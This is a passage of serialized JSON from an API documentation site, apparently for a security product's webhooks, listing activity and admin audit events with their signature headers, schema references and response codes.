download","isWebhook":true,"pointer":"/paths/file-download/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"File download","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/file-download/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_625"}},"schemaId":"schema_625","pointer":"/paths/file-download/post/requestBody","description":"A file download event occurred."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"file-download","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_625"}},"responseCodes":["2XX"],"pointer":"file-download","href":"activity/file-download-event","openApiOperationId":"file-download-event","summary":"File download"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_625","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_625"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/file-download/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/activity/file-download-event"}],"panels":[]}]},"httpPath":"file-download"},{"label":"File upload","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/activity/file-upload-event","routeSlug":"/webhooks-v1/activity/file-upload-event","metadata":{"seo":{"title":"File upload","description":"File upload"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"file-upload-event","name":"File upload","isWebhook":true,"pointer":"/paths/file-upload/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"File upload","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/file-upload/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_626"}},"schemaId":"schema_626","pointer":"/paths/file-upload/post/requestBody","description":"A file upload event occurred."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"file-upload","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_626"}},"responseCodes":["2XX"],"pointer":"file-upload","href":"activity/file-upload-event","openApiOperationId":"file-upload-event","summary":"File upload"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_626","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_626"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/file-upload/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/activity/file-upload-event"}],"panels":[]}]},"httpPath":"file-upload"},{"label":"Login","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/activity/login-event","routeSlug":"/webhooks-v1/activity/login-event","metadata":{"seo":{"title":"Login","description":"Login"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"login-event","name":"Login","isWebhook":true,"pointer":"/paths/login/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Login","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/login/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_627"}},"schemaId":"schema_627","pointer":"/paths/login/post/requestBody","description":"A login occurred."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"login","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_627"}},"responseCodes":["2XX"],"pointer":"login","href":"activity/login-event","openApiOperationId":"login-event","summary":"Login"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_627","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_627"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/login/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/activity/login-event"}],"panels":[]}]},"httpPath":"login"}],"content":{"contentType":"group","meta":{"name":"Activity"},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Activity","showPageActions":true},{"nodeType":"markdoc","content":"Events representing employee activity."}],"panels":[{"children":[{"kind":"group-items","title":"Webhooks","titleTranslationKey":"webhooks","items":[{"title":"file-download","summary":"File download","prefix":{"name":"post","color":"post"},"badges":[],"link":"/activity/file-download-event","deprecated":false},{"title":"file-upload","summary":"File upload","prefix":{"name":"post","color":"post"},"badges":[],"link":"/activity/file-upload-event","deprecated":false},{"title":"login","summary":"Login","prefix":{"name":"post","color":"post"},"badges":[],"link":"/activity/login-event","deprecated":false}]}]}]}]}},{"type":"group","label":"Audit","link":"/webhooks-v1/audit","routeSlug":"/webhooks-v1/audit","items":[{"label":"Account login method removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/account-login-method-removed-event","routeSlug":"/webhooks-v1/audit/account-login-method-removed-event","metadata":{"seo":{"title":"Account login method removed","description":"A login method for an account has been removed"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"account-login-method-removed-event","name":"Account login method removed","isWebhook":true,"pointer":"/paths/account-login-method-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Account login method removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A login method for an account has been removed"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/account-login-method-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_628"}},"schemaId":"schema_628","pointer":"/paths/account-login-method-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"account-login-method-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_628"}},"responseCodes":["2XX"],"pointer":"account-login-method-removed","href":"audit/account-login-method-removed-event","openApiOperationId":"account-login-method-removed-event","summary":"Account login method removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_628","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_628"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/account-login-method-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/account-login-method-removed-event"}],"panels":[]}]},"httpPath":"account-login-method-removed"},{"label":"Admin accepted invitation","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/admin-accepted-invitation-event","routeSlug":"/webhooks-v1/audit/admin-accepted-invitation-event","metadata":{"seo":{"title":"Admin accepted invitation","description":"A new admin user has accepted the invitation."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"admin-accepted-invitation-event","name":"Admin accepted invitation","isWebhook":true,"pointer":"/paths/admin-accepted-invitation/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Admin accepted invitation","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A new admin user has accepted the invitation."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/admin-accepted-invitation/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_629"}},"schemaId":"schema_629","pointer":"/paths/admin-accepted-invitation/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"admin-accepted-invitation","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_629"}},"responseCodes":["2XX"],"pointer":"admin-accepted-invitation","href":"audit/admin-accepted-invitation-event","openApiOperationId":"admin-accepted-invitation-event","summary":"Admin accepted invitation"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_629","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_629"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/admin-accepted-invitation/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/admin-accepted-invitation-event"}],"panels":[]}]},"httpPath":"admin-accepted-invitation"},{"label":"Admin enabled MFA","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/admin-enabled-mfa-event","routeSlug":"/webhooks-v1/audit/admin-enabled-mfa-event","metadata":{"seo":{"title":"Admin enabled MFA","description":"An admin user has enabled MFA for their account."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"admin-enabled-mfa-event","name":"Admin enabled MFA","isWebhook":true,"pointer":"/paths/admin-enabled-mfa/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Admin enabled MFA","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has enabled MFA for their account."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/admin-enabled-mfa/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_630"}},"schemaId":"schema_630","pointer":"/paths/admin-enabled-mfa/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"admin-enabled-mfa","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_630"}},"responseCodes":["2XX"],"pointer":"admin-enabled-mfa","href":"audit/admin-enabled-mfa-event","openApiOperationId":"admin-enabled-mfa-event","summary":"Admin enabled MFA"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_630","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_630"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/admin-enabled-mfa/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/admin-enabled-mfa-event"}],"panels":[]}]},"httpPath":"admin-enabled-mfa"},{"label":"Admin exported data","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/admin-exported-data-event","routeSlug":"/webhooks-v1/audit/admin-exported-data-event","metadata":{"seo":{"title":"Admin exported data","description":"An admin user has exported data."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"admin-exported-data-event","name":"Admin exported data","isWebhook":true,"pointer":"/paths/admin-exported-data/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Admin exported data","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has exported data."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/admin-exported-data/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_631"}},"schemaId":"schema_631","pointer":"/paths/admin-exported-data/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"admin-exported-data","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_631"}},"responseCodes":["2XX"],"pointer":"admin-exported-data","href":"audit/admin-exported-data-event","openApiOperationId":"admin-exported-data-event","summary":"Admin exported data"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_631","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_631"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/admin-exported-data/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/admin-exported-data-event"}],"panels":[]}]},"httpPath":"admin-exported-data"},{"label":"Admin loaded data","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/admin-loaded-data-event","routeSlug":"/webhooks-v1/audit/admin-loaded-data-event","metadata":{"seo":{"title":"Admin loaded data","description":"An admin user has loaded data."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"admin-loaded-data-event","name":"Admin loaded data","isWebhook":true,"pointer":"/paths/admin-loaded-data/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Admin loaded data","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"An admin user has loaded data."},"children":[]}]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Note: this event will only be emitted if extended admin audit logging is"},"children":[]},{"$$mdtype":"Node","type":"softbreak","inline":true,"attributes":{},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"enabled. "},"children":[]},{"$$mdtype":"Node","type":"link","inline":true,"attributes":{"href":"https://pushsecurity.com/help/audience/administrators/docs/administering-push/#admin-audit-events"},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Learn more"},"children":[]}]}]}]}]},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/admin-loaded-data/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_632"}},"schemaId":"schema_632","pointer":"/paths/admin-loaded-data/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"admin-loaded-data","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_632"}},"responseCodes":["2XX"],"pointer":"admin-loaded-data","href":"audit/admin-loaded-data-event","openApiOperationId":"admin-loaded-data-event","summary":"Admin loaded data"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_632","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_632"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/admin-loaded-data/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/admin-loaded-data-event"}],"panels":[]}]},"httpPath":"admin-loaded-data"},{"label":"Admin logged in","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/admin-logged-in-event","routeSlug":"/webhooks-v1/audit/admin-logged-in-event","metadata":{"seo":{"title":"Admin logged in","description":"An admin user has logged in."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"admin-logged-in-event","name":"Admin logged in","isWebhook":true,"pointer":"/paths/admin-logged-in/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Admin logged in","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has logged in."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/admin-logged-in/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_633"}},"schemaId":"schema_633","pointer":"/paths/admin-logged-in/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"admin-logged-in","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_633"}},"responseCodes":["2XX"],"pointer":"admin-logged-in","href":"audit/admin-logged-in-event","openApiOperationId":"admin-logged-in-event","summary":"Admin logged in"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_633","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_633"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/admin-logged-in/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/admin-logged-in-event"}],"panels":[]}]},"httpPath":"admin-logged-in"},{"label":"Admin removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/admin-removed-event","routeSlug":"/webhooks-v1/audit/admin-removed-event","metadata":{"seo":{"title":"Admin removed","description":"An admin user has been removed."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"admin-removed-event","name":"Admin removed","isWebhook":true,"pointer":"/paths/admin-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Admin removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has been removed."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/admin-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_634"}},"schemaId":"schema_634","pointer":"/paths/admin-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"admin-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_634"}},"responseCodes":["2XX"],"pointer":"admin-removed","href":"audit/admin-removed-event","openApiOperationId":"admin-removed-event","summary":"Admin removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_634","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_634"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/admin-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/admin-removed-event"}],"panels":[]}]},"httpPath":"admin-removed"},{"label":"Admin role updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/admin-role-updated-event","routeSlug":"/webhooks-v1/audit/admin-role-updated-event","metadata":{"seo":{"title":"Admin role updated","description":"An admin user has updated another user's role."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"admin-role-updated-event","name":"Admin role updated","isWebhook":true,"pointer":"/paths/admin-role-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Admin role updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has updated another user's role."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/admin-role-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request 